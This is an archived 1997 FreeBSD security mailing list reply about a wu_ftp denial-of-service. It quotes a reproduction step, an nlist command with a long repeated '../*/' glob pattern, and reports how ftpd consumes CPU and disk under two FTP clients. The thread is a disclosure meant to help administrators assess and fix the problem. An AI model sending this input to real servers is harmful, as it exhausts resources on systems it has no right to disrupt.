Date: Tue, 9 Sep 1997 19:41:21 +0200 From: Philippe Regnauld <regnauld@deepo.prosa.dk> To: Josef Karthauser <joe@pavilion.net> Cc: security@FreeBSD.ORG Subject: Re: FTP compromise. Message-ID: <19970909194121.10288@deepo.prosa.dk> In-Reply-To: <19970909144346.54450@pavilion.net>; from Josef Karthauser on Tue, Sep 09, 1997 at 02:43:46PM %2B0100 References: <19970909144346.54450@pavilion.net>
next in thread | previous in thread | raw e-mail | index | archive | help
Josef Karthauser writes:
> ll versions)
>
> TESTED: BSDI 3.0 (all patches), FreeBSD 2.2.1
>
> DATE: 15th Aug 1997
>
> REPEAT BY: Log into a wu_ftp server (either anonymously or as a user)
> and issue the command...
>
> nlist ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/
> ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/
> ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/
> ../*/../*/../*/../*/../*../*../*
Behaves differently depending on client.
stock ftp in -current (as of 28/07) makes ftpd eat 45% cpu, but
no noticeable memory footprint increase.
Killling ftp (the client) solves the problem.
With ncftp2, I get ftpd at 10-12% cpu, in a biowait loop, and
constant seeking on the disks. Killing ftpD is the only way out.
--
-- Phil
-[ Philippe Regnauld / Systems Administrator / regnauld@deepo.prosa.dk ]-
-[ Location.: +55.4N +11.3E PGP Key: finger regnauld@hotel.prosa.dk ]-
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?19970909194121.10288>